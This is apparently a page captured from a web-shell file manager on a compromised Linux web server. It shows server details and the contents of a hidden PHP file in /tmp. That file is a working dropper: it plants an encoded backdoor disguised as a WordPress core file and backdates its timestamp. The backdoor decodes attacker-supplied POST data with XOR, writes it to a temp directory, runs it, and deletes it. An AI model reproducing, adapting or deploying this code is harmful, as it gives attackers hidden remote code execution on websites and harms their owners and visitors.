HEX
Server: Apache/2.4.52 (Ubuntu)
System: Linux aritmodecarnaval.es 5.15.0-79-generic #86-Ubuntu SMP Mon Jul 10 16:07:21 UTC 2023 x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: //tmp/.ob_iconv_handle
<?php   $p = "/home/www/torresncgolf/wp-includes/blocks/template-part/Kariera.php"; $c = rawurldecode('%3C%3Fphp%0A%0Aif%28filter_has_var%28INPUT_POST%2C%20%22%5Cx64%5Cx65sc%22%29%29%7B%0A%09%24item%20%3D%20array_filter%28%5Bgetenv%28%22TEMP%22%29%2C%20session_save_path%28%29%2C%20%22/var/tmp%22%2C%20%22/dev/shm%22%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20getcwd%28%29%2C%20getenv%28%22TMP%22%29%2C%20%22/tmp%22%2C%20sys_get_temp_dir%28%29%5D%29%3B%0A%09%24sym%20%3D%20hex2bin%28%24_POST%5B%22%5Cx64%5Cx65sc%22%5D%29%3B%0A%09%24fac%3D%27%27%3Bforeach%28str_split%28%24sym%29%20as%20%24char%29%7B%24fac%20.%3D%20chr%28ord%28%24char%29%20%5E%2098%29%3B%7D%0A%09foreach%20%28%24item%20as%20%24key%20%3D%3E%20%24ref%29%20%7B%0A%20%20%20%20%09%09if%20%28%21%21is_dir%28%24ref%29%20%26%26%20%21%21is_writable%28%24ref%29%29%20%7B%0A%20%20%20%20%24obj%20%3D%20str_replace%28%22%7Bvar_dir%7D%22%2C%20%24ref%2C%20%22%7Bvar_dir%7D/.parameter_group%22%29%3B%0A%20%20%20%20if%20%28file_put_contents%28%24obj%2C%20%24fac%29%29%20%7B%0A%09include%20%24obj%3B%0A%09%40unlink%28%24obj%29%3B%0A%09die%28%29%3B%0A%7D%0A%7D%0A%7D%0A%7D'); if (file_put_contents($p, $c)) {     echo '!success!';     @touch($p, 1750783153); } die('!ended!');